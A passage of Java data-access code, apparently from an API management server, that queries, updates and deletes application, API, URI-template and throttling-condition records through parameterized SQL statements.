SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.NAME=? AND SUB" + "" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithGroupIdCaseInSensitive = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?))) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupIdCaseInSensitive = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR LOWER(SUB.USER_ID) = LOWER(?) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setString(++parameterIndex, applicationName); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setString(3, applicationName); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setString(2, applicationName); } rs = prepStmt.executeQuery(); while (rs.next()) { String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } private void setGroupIdInApplication(Application application) throws APIManagementException { String applicationGroupId = application.getGroupId(); if (StringUtils.isEmpty(applicationGroupId)) { // No migrated App groupId application.setGroupId(getGroupId(application.getId())); } else { // Migrated data exists where Group ID for this App has been stored in AM_APPLICATION table // in the format 'tenant/groupId', so extract groupId value and store it in the App object String[] split = applicationGroupId.split("/"); if (split.length == 2) { application.setGroupId(split[1]); } else { log.error("Migrated Group ID: " + applicationGroupId + "does not follow the expected format 'tenant/groupId'"); } } } public Application getApplicationById(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } public Application getApplicationById(int applicationId, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_ID_SQL; String whereClause = " AND SUB.USER_ID =?"; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) =LOWER(?)"; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInSensitive = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? )"; String whereClauseWithMultiGroupIdCaseInSensitive = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR LOWER(SUB.USER_ID) = LOWER(?) )"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length + 1; //since index 1 is applicationId // query params will fil from 2 prepStmt = fillQueryParams(connection, query, groupIds, 2); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setInt(1, applicationId); prepStmt.setString(++parameterIndex, userId); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, groupId); prepStmt.setString(3, userId); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, userId); } rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieves the Application which is corresponding to the given UUID String * * @param uuid UUID of Application * @return * @throws APIManagementException */ public Application getApplicationByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_UUID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, uuid); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created application.setLastUpdatedTime(application.getCreatedTime()); } } // Get custom attributes of application if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateURLTemplates(API api) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId; String deleteOldMappingsQuery = SQLConstants.REMOVE_FROM_URI_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteOldMappingsQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); addURLTemplates(apiId, api, connection); connection.commit(); } catch (SQLException e) { handleException("Error while deleting URL template(s) for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * returns all URL templates define for all active(PUBLISHED) APIs. */ public ArrayList<URITemplate> getAllURITemplates(String apiContext, String version) throws APIManagementException { if (APIUtil.isAdvanceThrottlingEnabled()) { return getAllURITemplatesAdvancedThrottle(apiContext, version); } else { return getAllURITemplatesOldThrottle(apiContext, version); } } public ArrayList<URITemplate> getAllURITemplatesOldThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); //TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.GET_ALL_URL_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); rs = prepStmt.executeQuery(); URITemplate uriTemplate; while (rs.next()) { uriTemplate = new URITemplate(); String script = null; uriTemplate.setHTTPVerb(rs.getString("HTTP_METHOD")); uriTemplate.setAuthType(rs.getString("AUTH_SCHEME")); uriTemplate.setUriTemplate(rs.getString("URL_PATTERN")); uriTemplate.setThrottlingTier(rs.getString("THROTTLING_TIER")); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); uriTemplate.getThrottlingConditions().add("_default"); uriTemplates.add(uriTemplate); } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } public ArrayList<URITemplate> getAllURITemplatesAdvancedThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int tenantId; ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(apiContext); if (apiTenantDomain != null) { tenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); } else { tenantId = MultitenantConstants.SUPER_TENANT_ID; } // TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.ThrottleSQLConstants.GET_CONDITION_GROUPS_FOR_POLICIES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); prepStmt.setInt(3, tenantId); rs = prepStmt.executeQuery(); Map<String, Set<ConditionGroupDTO>> mapByHttpVerbURLPatternToId = new HashMap<String, Set<ConditionGroupDTO>>(); while (rs != null && rs.next()) { String httpVerb = rs.getString("HTTP_METHOD"); String authType = rs.getString("AUTH_SCHEME"); String urlPattern = rs.getString("URL_PATTERN"); String policyName = rs.getString("THROTTLING_TIER"); String conditionGroupId = rs.getString("CONDITION_GROUP_ID"); String applicableLevel = rs.getString("APPLICABLE_LEVEL"); String policyConditionGroupId = "_condition_" + conditionGroupId; String key = httpVerb + ":" + urlPattern; if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (StringUtils.isEmpty(conditionGroupId)) { continue; } // Converting ConditionGroup to a lightweight ConditionGroupDTO. ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); // mapByHttpVerbURLPatternToId.get(key).add(policyConditionGroupId); mapByHttpVerbURLPatternToId.get(key).add(groupDTO); } else { String script = null; URITemplate uriTemplate = new URITemplate(); uriTemplate.setThrottlingTier(policyName); uriTemplate.setAuthType(authType); uriTemplate.setHTTPVerb(httpVerb); uriTemplate.setUriTemplate(urlPattern); uriTemplate.setApplicableLevel(applicableLevel); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); Set<ConditionGroupDTO> conditionGroupIdSet = new HashSet<ConditionGroupDTO>(); mapByHttpVerbURLPatternToId.put(key, conditionGroupIdSet); uriTemplates.add(uriTemplate); if (StringUtils.isEmpty(conditionGroupId)) { continue; } ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); conditionGroupIdSet.add(groupDTO); } } for (URITemplate uriTemplate : uriTemplates) { String key = uriTemplate.getHTTPVerb() + ":" + uriTemplate.getUriTemplate(); if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (!mapByHttpVerbURLPatternToId.get(key).isEmpty()) { Set<ConditionGroupDTO> conditionGroupDTOs = mapByHttpVerbURLPatternToId.get(key); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); conditionGroupDTOs.add(defaultGroup); // uriTemplate.getThrottlingConditions().addAll(mapByHttpVerbURLPatternToId.get(key)); uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(conditionGroupDTOs.toArray(new ConditionGroupDTO[]{})); } } if (uriTemplate.getThrottlingConditions().isEmpty()) { uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(new ConditionGroupDTO[]{defaultGroup}); } } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } /** * This method is used to get the API provider by giving API name, API version and tenant domain * * @param apiName API name * @param apiVersion API version * @param tenant tenant domain * @return API provider * @throws APIManagementException if failed to get the API provider by giving API name, API version, tenant domain */ public String getAPIProviderByNameAndVersion(String apiName, String apiVersion, String tenant) throws APIManagementException { if (StringUtils.isBlank(apiName) || StringUtils.isBlank(apiVersion) || StringUtils.isBlank(tenant)) { String msg = "API name, version, tenant cannot be null when fetching provider"; log.error(msg); throw new APIManagementException(msg); } PreparedStatement prepStmt = null; ResultSet rs = null; String apiProvider = null; String getAPIProviderQuery = null; try(Connection connection = APIMgtDBUtil.getConnection()) { if (MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equalsIgnoreCase(tenant)) { //in this case, the API should be fetched from super tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_SUPER_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); } else { //in this case, the API should be fetched from the respective tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_GIVEN_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); prepStmt.setString(3, "%" + tenant + "%"); } prepStmt.setString(1, apiName); prepStmt.setString(2, apiVersion); rs = prepStmt.executeQuery(); if (rs.next()) { apiProvider = rs.getString("API_PROVIDER"); } if (StringUtils.isBlank(apiProvider)) { String msg = "Unable to find provider for API: " + apiName + " in the database"; log.warn(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiName + " from the database", e); } return apiProvider; } /** * Converts an {@code Pipeline} object into a {@code ConditionGroupDTO}.{@code ConditionGroupDTO} class tries to * contain the same information held by {@code Pipeline}, but in a much lightweight fashion. * * @param conditionGroup Id of the condition group ({@code Pipeline}) to be converted * @return An object of {@code ConditionGroupDTO} type. * @throws APIManagementException */ private ConditionGroupDTO createConditionGroupDTO(int conditionGroup) throws APIManagementException { List<Condition> conditions = getConditions(conditionGroup); ArrayList<ConditionDTO> conditionDTOs = new ArrayList<ConditionDTO>(conditions.size()); for (Condition condition : conditions) { ConditionDTO conditionDTO = new ConditionDTO(); conditionDTO.setConditionType(condition.getType()); conditionDTO.isInverted(condition.isInvertCondition()); if (PolicyConstants.IP_RANGE_TYPE.equals(condition.getType())) { IPCondition ipRangeCondition = (IPCondition) condition; conditionDTO.setConditionName(ipRangeCondition.getStartingIP()); conditionDTO.setConditionValue(ipRangeCondition.getEndingIP()); } else if (PolicyConstants.IP_SPECIFIC_TYPE.equals(condition.getType())) { IPCondition ipCondition = (IPCondition) condition; conditionDTO.setConditionName(PolicyConstants.IP_SPECIFIC_TYPE); conditionDTO.setConditionValue(ipCondition.getSpecificIP()); } else if (PolicyConstants.HEADER_TYPE.equals(condition.getType())) { HeaderCondition headerCondition = (HeaderCondition) condition; conditionDTO.setConditionName(headerCondition.getHeaderName()); conditionDTO.setConditionValue(headerCondition.getValue()); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(condition.getType())) { JWTClaimsCondition jwtClaimsCondition = (JWTClaimsCondition) condition; conditionDTO.setConditionName(jwtClaimsCondition.getClaimUrl()); conditionDTO.setConditionValue(jwtClaimsCondition.getAttribute()); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(condition.getType())) { QueryParameterCondition parameterCondition = (QueryParameterCondition) condition; conditionDTO.setConditionName(parameterCondition.getParameter()); conditionDTO.setConditionValue(parameterCondition.getValue()); } conditionDTOs.add(conditionDTO); } ConditionGroupDTO conditionGroupDTO = new ConditionGroupDTO(); conditionGroupDTO.setConditions(conditionDTOs.toArray(new ConditionDTO[]{})); return conditionGroupDTO; } public void updateAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String previousDefaultVersion = getDefaultVersion(api.getId()); String query = SQLConstants.UPDATE_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //Header change check not required here as we update API level throttling tier //from same call. //TODO review and run tier update as separate query if need. prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getContext()); String contextTemplate = api.getContextTemplate(); //If the context template ends with {version} this means that the version will be at the end of the // context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(2, contextTemplate); //TODO Need to find who exactly does this update. prepStmt.setString(3, null); prepStmt.setTimestamp(4, new Timestamp(System.currentTimeMillis())); prepStmt.setString(5, api.getApiLevelPolicy()); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(7, api.getId().getApiName()); prepStmt.setString(8, api.getId().getVersion()); prepStmt.execute(); //} if (api.isDefaultVersion() ^ api.getId().getVersion().equals(previousDefaultVersion)) { //A change has // happen //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } else { //tick is removed removeAPIFromDefaultVersion(api.getId(), connection); } } connection.commit(); //check whether there are any associated api products before updating url temaplates and scopes //TODO move to constants String queryGetAssociatedAPIProducts = "SELECT AM_API_PRODUCT.UUID " + "FROM AM_API_PRODUCT_MAPPING, AM_API_URL_MAPPING, AM_API_PRODUCT " + "WHERE " + "AM_API_PRODUCT_MAPPING.URL_MAPPING_ID = AM_API_URL_MAPPING.URL_MAPPING_ID " + "AND AM_API_PRODUCT.API_PRODUCT_ID = AM_API_PRODUCT_MAPPING.API_PRODUCT_ID " + "AND API_ID = ?"; int apiId = getAPIID(api.getId(), connection); PreparedStatement prepStmtGetAssociatedAPIProducts = connection .prepareStatement(queryGetAssociatedAPIProducts); prepStmtGetAssociatedAPIProducts.setInt(1, apiId); ResultSet rs = null; rs = prepStmtGetAssociatedAPIProducts.executeQuery(); List<APIProduct> apiProducts = new ArrayList<APIProduct>(); while (rs.next()) { String productUUID = rs.getString("UUID"); apiProducts.add(getAPIProduct(productUUID)); } synchronized (scopeMutex) { //remove api product mappings before updating api url templates deleteProductMappingsForAPI(api, apiProducts); updateScopes(api, tenantId); updateURLTemplates(api); /* update scopes above will delete all scopes and scope mappings associated with API (including product scopes). after update url templates template ids will change. So we have to add product scopes and mappings again after updating api templates */ addProductMappingsForAPI(api, apiProducts); addProductScopes(apiProducts, tenantId); } } catch (SQLException e) { handleException("Error while updating the API: " + api.getId() + " in the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public int getAPIID(APIIdentifier apiId, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_ID"); } if (id == -1) { String msg = "Unable to find the API: " + apiId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiId + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Get product Id from the product name and the provider. * @param productName product name * @param provider provider * @param connection db connection * @return product id * @throws APIManagementException exception */ public int getAPIProductID(String productName, String provider, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_PRODUCT_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, productName); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_PRODUCT_ID"); } if (id == -1) { String msg = "Unable to find the API Product : " + productName + "-" + provider + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + productName + "-" + provider + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Delete a record from AM_APPLICATION_KEY_MAPPING table * * @param consumerKey * @throws APIManagementException */ public void deleteApplicationMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_MAPPINGS_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteApplicationKeyQuery); prepStmt.setString(1, consumerKey); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting mapping: consumer key " + consumerKey + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void deleteAPI(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int id; String deleteLCEventQuery = SQLConstants.REMOVE_FROM_API_LIFECYCLE_SQL; String deleteCommentQuery = SQLConstants.REMOVE_FROM_API_COMMENT_SQL; String deleteRatingsQuery = SQLConstants.REMOVE_FROM_API_RATING_SQL; String deleteSubscriptionQuery = SQLConstants.REMOVE_FROM_API_SUBSCRIPTION_SQL; String deleteExternalAPIStoresQuery = SQLConstants.REMOVE_FROM_EXTERNAL_STORES_SQL; String deleteAPIQuery = SQLConstants.REMOVE_FROM_API_SQL; String deleteURLTemplateQuery = SQLConstants.REMOVE_FROM_API_URL_MAPPINGS_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); id = getAPIID(apiId, connection); synchronized (scopeMutex) { removeAPIScope(apiId); } prepStmt = connection.prepareStatement(deleteSubscriptionQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all comments associated with given API prepStmt = connection.prepareStatement(deleteCommentQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteRatingsQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteLCEventQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all external APIStore details associated with a given API prepStmt = connection.prepareStatement(deleteExternalAPIStoresQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteURLTemplateQuery); prepStmt.setInt(1, id); prepStmt.execute(); String curDefaultVersion = getDefaultVersion(apiId); String pubDefaultVersion = getPublishedDefaultVersion(apiId); if (apiId.getVersion().equals(curDefaultVersion)) { removeAPIFromDefaultVersion(apiId, connection); } else if (apiId.getVersion().equals(pubDefaultVersion)) { 